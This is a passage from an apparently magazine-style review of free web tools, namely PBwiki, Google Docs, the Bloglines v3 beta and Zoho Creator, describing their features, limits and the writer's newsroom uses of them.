Initially recommended to our editorial team by one of our Web developers, PBwiki has turned out to be a useful tool to share information and advice about stories in the works and future story ideas. The site claims you can "use PBwiki to make a free wiki as easily as a peanut butter sandwich," and that's pretty much accurate. And once the wiki is set up, adding pages or text to it is quicker and easier than logging into a more structured format.

PBwiki offers ad-supported free wikis as well as paid, ad-free accounts. Wikis can be public or private/shared. You can add widgets (such as basic spreadsheets, chat, Google maps or videos), with additional functionality for paid accounts. All accounts can see revision updates and changes on the site and track changes via e-mail notification. Business accounts also offer different levels of access per user, the ability to make certain pages read-only and page-level RSS feeds.

Of course, there are drawbacks to free-form data as opposed to more structured formats; you can't really query or sort a text blob. There is a basic search box in a PBwiki, but searching for "Machlis" across many wiki pages can't give you the same targeted results as, say, querying a database for "all stories by author Machlis in the last three months."

Still, if you don't expect a wiki to do the job of a spreadsheet or a database, PBwiki can be a useful addition to your information management arsenal.

Google Docs

Yes, yes, I know: "Don't be evil" Google threatens to become the ubiquitous do-exactly-that Web empire, amassing too much information about individuals and too much power over what was supposed to be an egalitarian medium. Do we really want Google taking over our most-used applications, too? Perhaps not, but I can't help but like Google Docs.

Our recent review of four online office suites found that Google's offering lacked some important features such as spreadsheet charts. Unlike some, though, I'm not seeking to replace my desktop word processor or Microsoft Excel (by far my favorite spreadsheet). Instead, I see a good online suite as adding features such as file-sharing or online backup to my existing text editors and spreadsheet app.

Google Docs offers an easy way to work on documents at home, at the office and elsewhere, without having to e-mail files around. I keep some simple documents in Google Docs and download backups to my own PC. When I want the power-user functions of Word or Excel, I can work in those packages, upload the file to Google Docs and then download again to my next system before starting to work again. It's a version control system for documents and spreadsheets.

I often use Google Docs to keep my own "cheat sheets" for various applications and technologies, so I can remember instructions for coding I'll likely need in the future. It's useful to be able to add something I've suddenly figured out about, say, Ruby on Rails, whether I'm coding at home or at the office, without having to remember to add the information to a document residing on another machine.

In fact, I'm writing this story now in a Google Doc document. I don't need slick formatting, headers and scripts; basic writing, HTML coding and spell-check works just fine. However, when it comes time to turn it in, I'll be downloading it to my own system, saving it as a Word doc and e-mailing the file to my editor, since she's partial to Word's "track changes" function, which I must admit is more elegant than Google Doc's "compare revisions."

Still, comparing revisions is a nice function to have, along with some formatting, quick-link additions and sharing. And I've got a backup copy somewhere I can easily access if I want to make changes at home and then e-mail a new file.

Google's spreadsheet definitely isn't powerful enough for some of my projects. (A personal task analyzing local pedestrian accidents had too much data, for example.) However, it's fine for moderate strength tracking needs and superior when I want multiple users adding fairly simple data to a sheet. It's baffling that Microsoft hasn't jumped into the business of offering a Web platform for easily sharing Excel documents, although others such as eXpresso Corp. are trying to get into that business.

Meanwhile, I'm finding Google Docs a nice backup and version-control server for important and useful but not terribly private or sensitive documents.

Bloglines v3 beta

There are loads of RSS readers out there, including worthy entries like NewsGator and Google Reader, as well as some with Web 2.0 interfaces on steroids, such as Pageflakes.

But over the years, I kept returning to Bloglines, despite its aging Web 1.0 interface, because it did what I wanted done with a minimum of fuss. Finally, though, the new Bloglines v3 beta offers an updated UI with a start page and some drag-and-drop ordering that brings the RSS service into the modern era.

My goal in reading RSS feeds isn't to recreate a full, rich-media Web experience. If I wanted that, I'd be surfing directly to source sites. Instead, I want to scan headlines and summaries. I don't want to play around with a lot of buttons, links and options; I'm looking for information.

I want simple ways to subscribe to feeds and see what's new, with some basic feed organization tools. I want to be able to import and export OPML (a way to save a collection of feed subscriptions). And being able to "clip" and save individual stories is nice.

The beta was pretty limited when I started testing, without even a way to mark posts as still unread (that's since been addressed with a "pin" function). I'm still awaiting the "clippings" (keep and save some items) and "publish" (mark items to put in a new RSS feed you can make public) options, but the Bloglines beta help pages assure such functions are on the way.

The start page shows you summaries of headlines when you hover over the item, an AJAX standard that's just coming to Bloglines, and lets you easily add, delete and rearrange components.

The only major annoyance so far is that when I click on links from my start page, I just get a Bloglines summary pop-up instead of going to the source site; for that, I've got to move my mouse over to the pop-up window and click a second time. I'd prefer a summary when hovering but a link when I click.

Overall, though, it's looking like the Bloglines update will refresh but not mess with the basic functionalities that have won the service a place near the top of my browser bookmarks.

Zoho Creator

Unlike word processors or wikis, I haven't seen a flood of free Web sites for building database-driven applications. The few other database entries I'd tried were generally either limited, expensive or cumbersome. But not Zoho Creator.

Zoho Creator sports a surprisingly easy interface for creating your own apps -- even those that include some table joins (that is, looking up information in one table for use in another, which puts the "relational" in relational databases). With a few drag-and-drops, I quickly created data entry forms with text fields, drop-down lists, text boxes and so on.

My test applications ranged from simple (tracking charitable contributions) to complex (story tracking by writer, editor and status), and all ended up doing pretty much what I wanted.

One database collects all Computerworld product reviews published this year. You can see the live interactive database below. Sort by any of the available columns by clicking on the column header (clicking the same header toggles between ascending and descending sort). Click on the search box, and you'll see options to search by product name as well as headline and date.

There's a drag-and-drop option for adding a "lookup" field that pulls selections from another table. It's likewise fairly easy to set up different views of your data, and user-by-user access to each view and form. Creator also offers drag-and-drop scripting, allowing such things as setting defaults or variables based on certain conditions, sending out autogenerated e-mails when a field is changed in a specific way, or validating user input.

For more sophisticated scripting, it's easy to click back and forth between drag-and-drop scripting and the actual code. And I quickly downloaded data from Zoho Creator onto my own system for backup in varying formats, such as comma-separated or XLS spreadsheet format (although, alas, not in SQL) -- a must for any Web-based application where I'm storing important data.

I showed some of my colleagues the sample story-tracking app I put together on Creator, and response was highly favorable. I can think of many real-world uses for Creator, from detailed story tracking in our newsroom to keeping the list of who's slated to buy Friday morning donuts (making it simple to see who hasn't bought their share and even set up automated e-mail notifications when the list is changed). If you're a fan of structured data on the Web, both available to the public at large and shared with a select list of friends or colleagues, Zoho Creator is definitely worth a look.

Be aware that if you're a true database geek, Zoho Creator isn't a replacement for coding your own database app with something like PHP, Python or Ruby, and MySQL or PostgreSQL. Page layouts are limited (there are two, with no style customizations), and you can't do everything with variables, conditional scripting or sophisticated table joins that you can when coding from scratch. (I was told, for example, that I couldn't use a variable value as part of the name of my view.)

You can embed Zoho Creator applications in your own Web pages, although if you decide to use the apps at Zoho.com, you can't do things such as redirect users to a specific view after they've filled out a form. (They just get a message saying data was successfully submitted, followed by a new blank form.)

I find it occasionally frustrating that Zoho Creator uses its own scripting language, Deluge, requiring yet another new syntax to learn if I want to build functionality that goes beyond drag-and-drop offerings. For example, while it's easy to set up autogenerated mail to a specific hard-coded e-mail address, it took me several hours of poking around and document reading to figure out how to do so based on varying conditions. There's some documentation on Deluge at zoho.com but not too many other places to turn. (Note: Power users might want to check out a blog started recently by several Zoho Creator users, Land of ZC.)

And while most of the application is intuitive, some things are not, such as how to store a "collection" of records and even how to edit existing records (a puzzle shared by several of my colleagues, although easy to use once we found it -- a barely noticeable pencil icon next to records in a view).

Fortunately, though, the Zoho staff is quite responsive about answering questions, even from customers with free accounts. Some of the written responses can be a bit difficult to understand, but they're generally useful. In one case, someone even built me a sample application to demonstrate how to conditionally pull data from one table into another.

Zoho.com has a slew of other offerings, including word processing, spreadsheets, wikis, project management, "notebooks" and Web conferencing, although so far I've stuck with Creator. Many of the other apps, including the Google Docs competitors Zoho Writer and Zoho Sheet, are quite feature-packed, but too much at the expense of elegant UI for my tastes.

Earlier this month, Zoho announced a private beta of Zoho Business, a pay service that will include a companywide administrative console, telephone support and "co-branding." For now, most of the services are free, and the plan is to keep them so for individual use. I expect I'll be building some real apps on the site soon.